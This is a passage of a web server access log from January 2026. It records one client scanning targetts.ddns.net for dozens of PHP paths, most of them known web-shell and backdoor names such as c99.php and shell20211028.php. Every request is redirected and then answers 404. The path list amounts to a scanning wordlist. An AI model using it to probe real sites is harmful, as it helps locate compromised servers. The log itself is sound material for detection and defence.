[Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:46 +0000] - 404 404 - GET https targetts.ddns.net "/uploads/Casper.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:46 +0000] - - 301 - GET http targetts.ddns.net "/new.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:46 +0000] - 404 404 - GET https targetts.ddns.net "/new.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:47 +0000] - - 301 - GET http targetts.ddns.net "/wp-admin/images/commentv.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:47 +0000] - 404 404 - GET https targetts.ddns.net "/wp-admin/images/commentv.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:47 +0000] - - 301 - GET http targetts.ddns.net "/x/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:47 +0000] - 404 404 - GET https targetts.ddns.net "/x/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:47 +0000] - - 301 - GET http targetts.ddns.net "/dom.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:48 +0000] - 404 404 - GET https targetts.ddns.net "/dom.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:48 +0000] - - 301 - GET http targetts.ddns.net "/ooj.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:48 +0000] - 404 404 - GET https targetts.ddns.net "/ooj.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:48 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:49 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:49 +0000] - - 301 - GET http targetts.ddns.net "/BGA.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:49 +0000] - 404 404 - GET https targetts.ddns.net "/BGA.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:50 +0000] - - 301 - GET http targetts.ddns.net "//sad/about.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:50 +0000] - 404 404 - GET https targetts.ddns.net "//sad/about.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:50 +0000] - - 301 - GET http targetts.ddns.net "/nas.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:50 +0000] - 404 404 - GET https targetts.ddns.net "/nas.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:51 +0000] - - 301 - GET http targetts.ddns.net "/loi.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:51 +0000] - 404 404 - GET https targetts.ddns.net "/loi.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:51 +0000] - - 301 - GET http targetts.ddns.net "/lov.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:51 +0000] - 404 404 - GET https targetts.ddns.net "/lov.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:51 +0000] - - 301 - GET http targetts.ddns.net "/avaa.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:52 +0000] - 404 404 - GET https targetts.ddns.net "/avaa.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:52 +0000] - - 301 - GET http targetts.ddns.net "/nwwha.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:52 +0000] - 404 404 - GET https targetts.ddns.net "/nwwha.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:52 +0000] - - 301 - GET http targetts.ddns.net "//index/function.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:53 +0000] - 404 404 - GET https targetts.ddns.net "//index/function.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:53 +0000] - - 301 - GET http targetts.ddns.net "//admin.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:53 +0000] - 404 404 - GET https targetts.ddns.net "//admin.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:54 +0000] - - 301 - GET http targetts.ddns.net "/wp-includes/IXR/moon.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:54 +0000] - 404 404 - GET https targetts.ddns.net "/wp-includes/IXR/moon.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:54 +0000] - - 301 - GET http targetts.ddns.net "//shell20211028.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:54 +0000] - 404 404 - GET https targetts.ddns.net "//shell20211028.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:54 +0000] - - 301 - GET http targetts.ddns.net "//skin/install/default/security.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:55 +0000] - 404 404 - GET https targetts.ddns.net "//skin/install/default/security.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:55 +0000] - - 301 - GET http targetts.ddns.net "/~norapump/hah.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:55 +0000] - 404 404 - GET https targetts.ddns.net "/~norapump/hah.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:55 +0000] - - 301 - GET http targetts.ddns.net "//wp-admin/class-db.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:55 +0000] - 404 404 - GET https targetts.ddns.net "//wp-admin/class-db.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:56 +0000] - - 301 - GET http targetts.ddns.net "//buy.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:56 +0000] - 404 404 - GET https targetts.ddns.net "//buy.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:56 +0000] - - 301 - GET http targetts.ddns.net "/gib.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:56 +0000] - 404 404 - GET https targetts.ddns.net "/gib.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:56 +0000] - - 301 - GET http targetts.ddns.net "/des.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:57 +0000] - 404 404 - GET https targetts.ddns.net "/des.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:57 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/plugins/achdxhv/languages/admin.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:57 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/plugins/achdxhv/languages/admin.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:57 +0000] - - 301 - GET http targetts.ddns.net "/hzz.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:57 +0000] - 404 404 - GET https targetts.ddns.net "/hzz.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:58 +0000] - - 301 - GET http targetts.ddns.net "/rezor.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:58 +0000] - 404 404 - GET https targetts.ddns.net "/rezor.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:58 +0000] - - 301 - GET http targetts.ddns.net "/wp-admin/network/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:58 +0000] - 404 404 - GET https targetts.ddns.net "/wp-admin/network/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:59 +0000] - - 301 - GET http targetts.ddns.net "/oivcl.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:59 +0000] - 404 404 - GET https targetts.ddns.net "/oivcl.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:59 +0000] - - 301 - GET http targetts.ddns.net "/wp-admin/install.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:59 +0000] - 404 404 - GET https targetts.ddns.net "/wp-admin/install.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:59 +0000] - - 301 - GET http targetts.ddns.net "/db.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:00 +0000] - 404 404 - GET https targetts.ddns.net "/db.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:00 +0000] - - 301 - GET http targetts.ddns.net "//autoload_classmap.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:00 +0000] - 404 404 - GET https targetts.ddns.net "//autoload_classmap.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:00 +0000] - - 301 - GET http targetts.ddns.net "/dropdown.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:00 +0000] - 404 404 - GET https targetts.ddns.net "/dropdown.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:01 +0000] - - 301 - GET http targetts.ddns.net "/images/c99.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:01 +0000] - 404 404 - GET https targetts.ddns.net "/images/c99.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:01 +0000] - - 301 - GET http targetts.ddns.net "//doc.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:01 +0000] - 404 404 - GET https targetts.ddns.net "//doc.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:01 +0000] - - 301 - GET http targetts.ddns.net "/ps.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:02 +0000] - 404 404 - GET https targetts.ddns.net "/ps.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:02 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/about.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:02 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/about.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:02 +0000] - - 301 - GET http targetts.ddns.net "/output.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:03 +0000] - 404 404 - GET https targetts.ddns.net "/output.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:03 +0000] - - 301 - GET http targetts.ddns.net "/wp-xml.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:03 +0000] - 404 404 - GET https targetts.ddns.net "/wp-xml.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:03 +0000] - - 301 - GET http targetts.ddns.net "/13.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:04 +0000] - 404 404 - GET https targetts.ddns.net "/13.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:04 +0000] - - 301 - GET http targetts.ddns.net "/wp-2019.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:04 +0000] - 404 404 - GET https targetts.ddns.net "/wp-2019.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:04 +0000] - - 301 - GET http targetts.ddns.net "/classwithtostring.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:04 +0000] - 404 404 - GET https targetts.ddns.net "/classwithtostring.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:05 +0000] - - 301 - GET http targetts.ddns.net "/.trash7309/fafa/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:05 +0000] - 404 404 - GET https targetts.ddns.net "/.trash7309/fafa/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:05 +0000] - - 301 - GET http targetts.ddns.net "//wp.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:05 +0000] - 404 404 - GET https targetts.ddns.net "//wp.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:05 +0000] - - 301 - GET http targetts.ddns.net "//lufix.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:06 +0000] - 404 404 - GET https targetts.ddns.net "//lufix.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:06 +0000] - - 301 - GET http targetts.ddns.net "//elp.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:06 +0000] - 404 404 - GET https targetts.ddns.net "//elp.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:06 +0000] - - 301 - GET http targetts.ddns.net "/wrt.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:06 +0000] - 404 404 - GET https targetts.ddns.net "/wrt.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:07 +0000] - - 301 - GET http targetts.ddns.net "/dr.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:07 +0000] - 404 404 - GET https targetts.ddns.net "/dr.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:08 +0000] - - 301 - GET http targetts.ddns.net "/wp-includes/blocks/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:08 +0000] - 404 404 - GET https targetts.ddns.net "/wp-includes/blocks/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:08 +0000] - - 301 - GET http targetts.ddns.net "/wtu.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:08 +0000] - 404 404 - GET https targetts.ddns.net "/wtu.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:09 +0000] - - 301 - GET http targetts.ddns.net "/blog/byp.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:09 +0000] - 404 404 - GET https targetts.ddns.net "/blog/byp.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:09 +0000] - - 301 - GET http targetts.ddns.net "/led.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:09 +0000] - 404 404 - GET https targetts.ddns.net "/led.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:09 +0000] - - 301 - GET http targetts.ddns.net "/bhfnd.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:10 +0000] - 404 404 - GET https targetts.ddns.net "/bhfnd.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:10 +0000] - - 301 - GET http targetts.ddns.net "//index/function.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:10 +0000] - 404 404 - GET https targetts.ddns.net "//index/function.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:11 +0000] - - 301 - GET http targetts.ddns.net "/readme.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:11 +0000] - 404 404 - GET https targetts.ddns.net "/readme.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:11 +0000] - - 301 - GET http targetts.ddns.net "/aku.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:11 +0000] - 404 404 - GET https targetts.ddns.net "/aku.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:12 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/themes/about.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:12 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/themes/about.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:12 +0000] - - 301 - GET http targetts.ddns.net "/x.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:12 +0000] - 404 404 - GET https targetts.ddns.net "/x.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:13 +0000] - - 301 - GET http targetts.ddns.net "/fox.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:13 +0000] - 404 404 - GET https targetts.ddns.net "/fox.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:13 +0000] - - 301 - GET http targetts.ddns.net "/7f8c8.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:13 +0000] - 404 404 - GET https targetts.ddns.net "/7f8c8.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:13 +0000] - - 301 - GET http targetts.ddns.net "/poj.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:14 +0000] - 404 404 - GET https targetts.ddns.net "/poj.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:14 +0000] - - 301 - GET http targetts.ddns.net "/zze.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:14 +0000] - 404 404 - GET https targetts.ddns.net "/zze.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:14 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:14 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:15 +0000] - - 301 - GET http targetts.ddns.net "/weozh.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:15 +0000] - 404 404 - GET https targetts.ddns.net "/weozh.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:15 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/themes/about.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:16 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/themes/about.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:16 +0000] - - 301 - GET http targetts.ddns.net "/zznmg.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:16 +0000] - 404 404 - GET https targetts.ddns.net "/zznmg.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:16 +0000] - - 301 - GET http targetts.ddns.net "/help/crnpwfiu.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:16 +0000] - 404 404 - GET https targetts.ddns.net "/help/crnpwfiu.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:17 +0000] - - 301 - GET http targetts.ddns.net "/eru.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:17 +0000] - 404 404 - GET https targetts.ddns.net "/eru.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:17 +0000] - - 301 - GET http targetts.ddns.net "/index/zwso.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:17 +0000] - 404 404 - GET https targetts.ddns.net "/index/zwso.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:18 +0000] - - 301 - GET http targetts.ddns.net "/images/2008.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:18 +0000] - 404 404 - GET https targetts.ddns.net "/images/2008.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:18 +0000] - - 301 - GET http targetts.ddns.net "//.cache/x.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:18 +0000] - 404 404 - GET https targetts.ddns.net "//.cache/x.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:18 +0000] - - 301 - GET http targetts.ddns.net "/pow.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:19 +0000] - 404 404 - GET https targetts.ddns.net "/pow.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:19 +0000] - - 301 - GET http targetts.ddns.net "/dop.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:19 +0000] - 404 404 - GET https targetts.ddns.net "/dop.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:19 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/plugins/" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:19 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/plugins/" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:20 +0000] - - 301 - GET http targetts.ddns.net "/lv.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:20 +0000] - 404 404 - GET https targetts.ddns.net "/lv.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:20 +0000] - - 301 - GET http targetts.ddns.net "/MTOS/byp.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:21 +0000] - 404 404 - GET https targetts.ddns.net "/MTOS/byp.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:21 +0000] - - 301 - GET http targetts.ddns.net "//wp-includes/assets/index.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:21 +0000] - 404 404 - GET https targetts.ddns.net "//wp-includes/assets/index.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:21 +0000] - - 301 - GET http targetts.ddns.net "//wp-includes/customize/index.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:22 +0000] - 404 404 - GET https targetts.ddns.net "//wp-includes/customize/index.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:22 +0000] - - 301 - GET http targetts.ddns.net "/pkmoj.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:22 +0000] - 404 404 - GET https targetts.ddns.net "/pkmoj.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:19:22 +0000] - - 301 - GET http targetts.ddns.net "/uploads/upload2.php" [Client 20.239.71.136] [Length 166] [Gzip -] 